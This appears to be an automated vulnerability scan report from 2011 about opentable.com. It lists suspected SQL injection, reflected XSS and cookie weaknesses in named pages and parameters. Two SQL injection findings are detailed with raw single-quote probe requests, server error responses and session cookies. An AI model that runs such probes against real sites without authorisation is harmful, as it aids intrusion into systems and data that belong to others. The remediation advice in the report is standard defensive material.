XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, opentable.com

Report generated by XSS.CX at Mon Oct 03 09:11:44 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx [REST URL parameter 4]

1.2. http://www.opentable.com/jaspers-corner-tap-and-kitchen [REST URL parameter 1]

1.3. http://www.opentable.com/jscripts/ScriptHandler.ashx [REST URL parameter 2]

2. XPath injection

3. Cross-site scripting (reflected)

XSS in opentable.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

3.1. http://www.opentable.com/interim.aspx [d parameter]

3.2. http://www.opentable.com/interim.aspx [name of an arbitrarily supplied request parameter]

3.3. http://www.opentable.com/interim.aspx [p parameter]

3.4. http://www.opentable.com/interim.aspx [restref parameter]

3.5. http://www.opentable.com/interim.aspx [rid parameter]

3.6. http://www.opentable.com/interim.aspx [rtype parameter]

3.7. http://www.opentable.com/interim.aspx [t parameter]

3.8. http://www.opentable.com/opentables.aspx [d parameter]

3.9. http://www.opentable.com/opentables.aspx [name of an arbitrarily supplied request parameter]

3.10. http://www.opentable.com/opentables.aspx [p parameter]

3.11. http://www.opentable.com/opentables.aspx [restref parameter]

3.12. http://www.opentable.com/opentables.aspx [rid parameter]

3.13. http://www.opentable.com/opentables.aspx [rtype parameter]

3.14. http://www.opentable.com/opentables.aspx [t parameter]

3.15. http://www.opentable.com/restaurant-search.aspx [PartySize parameter]

3.16. http://www.opentable.com/restaurant-search.aspx [ResTime parameter]

3.17. http://www.opentable.com/interim.aspx [lsCKE cookie]

3.18. http://www.opentable.com/interim.aspx [lsCKE cookie]

3.19. http://www.opentable.com/opentables.aspx [lsCKE cookie]

3.20. http://www.opentable.com/opentables.aspx [lsCKE cookie]

3.21. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

3.22. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

3.23. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

3.24. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

4. Flash cross-domain policy

5. Cookie scoped to parent domain

5.1. http://www.opentable.com/frontdoor/default.aspx

5.2. http://www.opentable.com/interim.aspx

5.3. http://www.opentable.com/jaspers-corner-tap-and-kitchen

5.4. http://www.opentable.com/opentables.aspx

5.5. http://www.opentable.com/restaurant-search.aspx

6. Cross-domain Referer leakage

6.1. http://www.opentable.com/frontdoor/default.aspx

6.2. http://www.opentable.com/interim.aspx

6.3. http://www.opentable.com/jaspers-corner-tap-and-kitchen

6.4. http://www.opentable.com/opentables.aspx

7. Cookie without HttpOnly flag set

7.1. http://www.opentable.com/frontdoor/default.aspx

7.2. http://www.opentable.com/interim.aspx

7.3. http://www.opentable.com/jaspers-corner-tap-and-kitchen

7.4. http://www.opentable.com/opentables.aspx

7.5. http://www.opentable.com/restaurant-search.aspx

8. Email addresses disclosed

8.1. http://www.opentable.com//info/restaurateurs/img/common/1x1.gif

8.2. http://www.opentable.com//info/restaurateurs/img/restjoinus/overview.jpg

8.3. http://www.opentable.com//info/restaurateurs/img/restjoinus/whitedots_278.gif

8.4. http://www.opentable.com/WebResource.axd

8.5. http://www.opentable.com/blank.html

8.6. http://www.opentable.com/favicon.ico

8.7. http://www.opentable.com/frontdoor/css/ot_short.css

8.8. http://www.opentable.com/frontdoor/default.aspx

8.9. http://www.opentable.com/frontdoor/img/downarrow_gray.gif

8.10. http://www.opentable.com/frontdoor/img/icons_final_dark.png

8.11. http://www.opentable.com/frontdoor/img/ot_btn_black.png

8.12. http://www.opentable.com/frontdoor/js/jquery-ui/css/custom-theme/images/ui-bg_flat_75_ffffff_40x100.png

8.13. http://www.opentable.com/frontdoor/js/jquery-ui/css/custom-theme/jquery-ui-1.8.5.custom.css

8.14. http://www.opentable.com/frontdoor/js/jquery-ui/jquery-ui-1.8.11.custom.min.js

8.15. http://www.opentable.com/frontdoor/js/jquery-ui/jquery.scrollTo-min.js

8.16. http://www.opentable.com/httphandlers/MetroData.aspx

8.17. http://www.opentable.com/img/borders/modules/all-corners.png

8.18. http://www.opentable.com/img/borders/modules/ot_borders_noshadow.gif

8.19. http://www.opentable.com/img/borders/modules/ot_borders_noshadow_green.gif

8.20. http://www.opentable.com/img/borders/modules/ot_borders_promos_noshadow.png

8.21. http://www.opentable.com/img/borders/modules/ot_box_noshadow.gif

8.22. http://www.opentable.com/img/borders/modules/ot_box_noshadow_green.png

8.23. http://www.opentable.com/img/borders/modules/ot_box_promos_noshadow.png

8.24. http://www.opentable.com/img/borders/modules/ot_box_white_noshadow.gif

8.25. http://www.opentable.com/img/borders/modules/popup_corners.gif

8.26. http://www.opentable.com/img/borders/modules/tabmanager_coners_thick.png

8.27. http://www.opentable.com/img/buttons/btn_findatableNew.png

8.28. http://www.opentable.com/img/buttons/close_popup.gif

8.29. http://www.opentable.com/img/buttons/poweredbyOpenTableStacked.png

8.30. http://www.opentable.com/img/buttons/results-grid-buttons-restrefAB.gif

8.31. http://www.opentable.com/img/buttonsNew/secondary_left_medium.png

8.32. http://www.opentable.com/img/buttonsNew/secondary_right_medium.png

8.33. http://www.opentable.com/img/common/1x1.gif

8.34. http://www.opentable.com/img/common/Badge_Anon.gif

8.35. http://www.opentable.com/img/common/default_img_DC.gif

8.36. http://www.opentable.com/img/common/icons_final2.png

8.37. http://www.opentable.com/img/common/img_diningChk.gif

8.38. http://www.opentable.com/img/common/privatedining_startpagepromo.jpg

8.39. http://www.opentable.com/img/dnbase/arr_carot_gray.gif

8.40. http://www.opentable.com/img/dnbase/circle_1.gif

8.41. http://www.opentable.com/img/dnbase/circle_2.gif

8.42. http://www.opentable.com/img/dnbase/circle_3.gif

8.43. http://www.opentable.com/img/dnbase/dotrul.gif

8.44. http://www.opentable.com/img/dnbase/dotrul_706.gif

8.45. http://www.opentable.com/img/icons/FaceBook_24x24.png

8.46. http://www.opentable.com/img/icons/Twitter_24x24.png

8.47. http://www.opentable.com/img/info/DiningRewards.gif

8.48. http://www.opentable.com/img/info/Zagat_Affiliate_Page2.PNG

8.49. http://www.opentable.com/img/inputfield-down-arrow.gif

8.50. http://www.opentable.com/img/logos/opentable_logo_reg.png

8.51. http://www.opentable.com/img/logos/sh_en_safeharborlogo.jpg

8.52. http://www.opentable.com/img/privatediningimages/200-200_Golden%20Gate%20Room.jpg

8.53. http://www.opentable.com/img/privatediningimages/200-634353727080820434-0_Orpheum_Banquet_340x226_72dpi.jpg

8.54. http://www.opentable.com/img/privatediningimages/200-634499711498151079-5976432047_d8d9a5ed37_o.jpg

8.55. http://www.opentable.com/img/restProfile/OffersBGCenterSolidGray.png

8.56. http://www.opentable.com/img/restProfile/OffersBGSolidGray.png

8.57. http://www.opentable.com/img/restProfile/ToolBar8bitGray.png

8.58. http://www.opentable.com/img/restProfile/ToolBarBGCenterGray.png

8.59. http://www.opentable.com/img/restProfile/icons.png

8.60. http://www.opentable.com/img/restProfile/offersIcons.png

8.61. http://www.opentable.com/img/restimages/90.jpg

8.62. http://www.opentable.com/img/restimages/x4/12796.jpg

8.63. http://www.opentable.com/img/restimages/x4/12817.jpg

8.64. http://www.opentable.com/img/restimages/x4/13705.jpg

8.65. http://www.opentable.com/img/restimages/x4/18361.jpg

8.66. http://www.opentable.com/img/restimages/x4/19294.jpg

8.67. http://www.opentable.com/img/restimages/x4/2051.jpg

8.68. http://www.opentable.com/img/restimages/x4/21061.jpg

8.69. http://www.opentable.com/img/restimages/x4/21835.jpg

8.70. http://www.opentable.com/img/restimages/x4/22711.jpg

8.71. http://www.opentable.com/img/restimages/x4/23506.jpg

8.72. http://www.opentable.com/img/restimages/x4/23587.jpg

8.73. http://www.opentable.com/img/restimages/x4/2376.jpg

8.74. http://www.opentable.com/img/restimages/x4/25267.jpg

8.75. http://www.opentable.com/img/restimages/x4/27049.jpg

8.76. http://www.opentable.com/img/restimages/x4/28498.jpg

8.77. http://www.opentable.com/img/restimages/x4/29911.jpg

8.78. http://www.opentable.com/img/restimages/x4/3261.jpg

8.79. http://www.opentable.com/img/restimages/x4/32800.jpg

8.80. http://www.opentable.com/img/restimages/x4/33988.jpg

8.81. http://www.opentable.com/img/restimages/x4/34978.jpg

8.82. http://www.opentable.com/img/restimages/x4/35518.jpg

8.83. http://www.opentable.com/img/restimages/x4/3691.jpg

8.84. http://www.opentable.com/img/restimages/x4/3847.jpg

8.85. http://www.opentable.com/img/restimages/x4/40873.jpg

8.86. http://www.opentable.com/img/restimages/x4/41065.jpg

8.87. http://www.opentable.com/img/restimages/x4/4119.jpg

8.88. http://www.opentable.com/img/restimages/x4/42679.jpg

8.89. http://www.opentable.com/img/restimages/x4/46645.jpg

8.90. http://www.opentable.com/img/restimages/x4/49015.jpg

8.91. http://www.opentable.com/img/restimages/x4/52144.jpg

8.92. http://www.opentable.com/img/restimages/x4/52390.jpg

8.93. http://www.opentable.com/img/restimages/x4/57301.jpg

8.94. http://www.opentable.com/img/restimages/x4/57688.jpg

8.95. http://www.opentable.com/img/restimages/x4/58960.jpg

8.96. http://www.opentable.com/img/restimages/x4/59305.jpg

8.97. http://www.opentable.com/img/restimages/x4/60214.jpg

8.98. http://www.opentable.com/img/restimages/x4/60505.jpg

8.99. http://www.opentable.com/img/restimages/x4/6189.jpg

8.100. http://www.opentable.com/img/restimages/x4/61969.jpg

8.101. http://www.opentable.com/img/restimages/x4/63097.jpg

8.102. http://www.opentable.com/img/restimages/x4/63430.jpg

8.103. http://www.opentable.com/img/restimages/x4/65959.jpg

8.104. http://www.opentable.com/img/restimages/x4/67378.jpg

8.105. http://www.opentable.com/img/restimages/x4/68701.jpg

8.106. http://www.opentable.com/img/restimages/x4/70561.jpg

8.107. http://www.opentable.com/img/restimages/x4/7764.jpg

8.108. http://www.opentable.com/img/restimages/x6/15202.jpg

8.109. http://www.opentable.com/img/restimages/x6/21835.jpg

8.110. http://www.opentable.com/img/restimages/x6/3644.jpg

8.111. http://www.opentable.com/img/restimages/x6/46198.jpg

8.112. http://www.opentable.com/img/restimages/x6/63817.jpg

8.113. http://www.opentable.com/img/startpagepromo/Artisanal-Cocktails.jpg

8.114. http://www.opentable.com/img/startpagepromo/Business-Bites-Lunches.jpg

8.115. http://www.opentable.com/img/startpagepromo/Free-Corkage-BYOB.jpg

8.116. http://www.opentable.com/img/startpagepromo/Great-For-Groups.jpg

8.117. http://www.opentable.com/img/startpagepromo/Napa-Valley-Start.jpg

8.118. http://www.opentable.com/img/startpagepromo/Outdoor-Dining.jpg

8.119. http://www.opentable.com/img/startpagepromo/Sunday-Brunch.jpg

8.120. http://www.opentable.com/img/startpagepromo/blue_moon_ot_138x95.jpg

8.121. http://www.opentable.com/img/startpagepromo/img_car_1k.jpg

8.122. http://www.opentable.com/img/startpagepromo/michelinguide_138x95.jpg

8.123. http://www.opentable.com/img/startpagepromo/nationalrw_138x95.jpg

8.124. http://www.opentable.com/img/startpagepromo/phones_138x95.jpg

8.125. http://www.opentable.com/img/startpagepromo/preposttheatre_138x95.jpg

8.126. http://www.opentable.com/img/startpagepromo/promo_DC_sm.jpg

8.127. http://www.opentable.com/img/startpagepromo/spotlight_135x95.jpg

8.128. http://www.opentable.com/img/stg/ResultsProcessingAnimationNew.gif

8.129. http://www.opentable.com/img/stg/progress_text_reg.gif

8.130. http://www.opentable.com/img/stg/progressn1.gif

8.131. http://www.opentable.com/img/themes/normal/cnr_paleyellow_tl.gif

8.132. http://www.opentable.com/img/themes/normal/cnr_paleyellow_tr.gif

8.133. http://www.opentable.com/img/themes/normal/table-head-gradient-gray.png

8.134. http://www.opentable.com/img/themes/white/rest_profile_tabs.png

8.135. http://www.opentable.com/img/themes/white/table-head-gradient-gray.png

8.136. http://www.opentable.com/img/themes/white/toplinecurve_980.gif

8.137. http://www.opentable.com/img/topten/Sprite_RatingStars_0-5.png

8.138. http://www.opentable.com/info/restaurateurs/img/arrow.gif

8.139. http://www.opentable.com/info/restaurateurs/img/common/1x1.gif

8.140. http://www.opentable.com/info/restaurateurs/img/loadingAnimation.gif

8.141. http://www.opentable.com/info/restaurateurs/img/restjoinus/btn_contactus.gif

8.142. http://www.opentable.com/info/restaurateurs/img/restjoinus/btn_download.gif

8.143. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_lowerleft.gif

8.144. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_lowerright.gif

8.145. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_upperleft.gif

8.146. http://www.opentable.com/info/restaurateurs/img/restjoinus/contactcorner_upperright.gif

8.147. http://www.opentable.com/info/restaurateurs/img/restjoinus/overview.jpg

8.148. http://www.opentable.com/info/restaurateurs/img/restjoinus/whitedots_278.gif

8.149. http://www.opentable.com/interim.aspx

8.150. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx

8.151. http://www.opentable.com/ism/thickbox.css

8.152. http://www.opentable.com/ism/thickbox.js

8.153. http://www.opentable.com/jaspers-corner-tap-and-kitchen

8.154. http://www.opentable.com/jscripts/ScriptHandler.ashx

8.155. http://www.opentable.com/jscripts/common93.js

8.156. http://www.opentable.com/jscripts/imgCalendar_intl.js

8.157. http://www.opentable.com/jscripts/jcarousellite.js

8.158. http://www.opentable.com/jscripts/lib/thirdparty/prototype.js

8.159. http://www.opentable.com/jscripts/mbox.js

8.160. http://www.opentable.com/jscripts/otlibrary.js

8.161. http://www.opentable.com/jscripts/s_code.js

8.162. http://www.opentable.com/jscripts/search/Filters.js

8.163. http://www.opentable.com/jscripts/search/Results.Common.js

8.164. http://www.opentable.com/jscripts/search/Results.js

8.165. http://www.opentable.com/jscripts/search/SearchBox.js

8.166. http://www.opentable.com/jscripts/topten.js

8.167. http://www.opentable.com/opentables.aspx

8.168. http://www.opentable.com/rest_profile.aspx

8.169. http://www.opentable.com/restaurant-search.aspx

8.170. http://www.opentable.com/styles/Modules/Search.css

8.171. http://www.opentable.com/styles/Modules/popup.css

8.172. http://www.opentable.com/styles/Normal/OTCalStylesNormal.css

8.173. http://www.opentable.com/styles/Normal/ot_style003.css

8.174. http://www.opentable.com/styles/Normal/topandbot.css

8.175. http://www.opentable.com/styles/Pages/Start.css

8.176. http://www.opentable.com/styles/PromoNationalRoundup.css

8.177. http://www.opentable.com/styles/RestaurantProfile.css

8.178. http://www.opentable.com/styles/SearchControl.css

8.179. http://www.opentable.com/styles/dimensions.css

8.180. http://www.opentable.com/styles/dipProgram.css

8.181. http://www.opentable.com/styles/form_elements.css

8.182. http://www.opentable.com/styles/home.css

8.183. http://www.opentable.com/styles/interim.css

8.184. http://www.opentable.com/styles/iphone.css

8.185. http://www.opentable.com/styles/ot_style123.css

8.186. http://www.opentable.com/styles/plainPages.css

8.187. http://www.opentable.com/styles/searchModule.css

8.188. http://www.opentable.com/styles/thickbox.css

8.189. http://www.opentable.com/styles/white/OpenTablesAB.css

8.190. http://www.opentable.com/styles/white/topandbot.css

8.191. http://www.opentable.com/styles/white/topandbot_old.css

8.192. http://www.opentable.com/styles/wick002.css

8.193. http://www.opentable.com/styles/wick003.css

9. Robots.txt file

10. Content type incorrectly stated



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx [REST URL parameter 4]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /irp/jquery/js/ScriptHandler.ashx

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /irp/jquery/js/ScriptHandler.ashx'?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:56:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a56%3a34&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /irp/jquery/js/ScriptHandler.ashx''?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:56:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a56%3a34&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...

1.2. http://www.opentable.com/jaspers-corner-tap-and-kitchen [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jaspers-corner-tap-and-kitchen'?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
